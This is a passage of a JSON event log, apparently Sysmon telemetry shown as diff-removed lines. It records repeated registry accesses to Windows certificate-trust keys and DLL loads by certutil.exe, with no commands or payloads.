Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497300000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Wldap32.dll", - "image_path": "C:\\Windows\\System32\\Wldap32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497450016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cabinet.dll", - "image_path": "C:\\Windows\\System32\\cabinet.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "normaliz.dll", - "image_path": "C:\\Windows\\System32\\normaliz.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 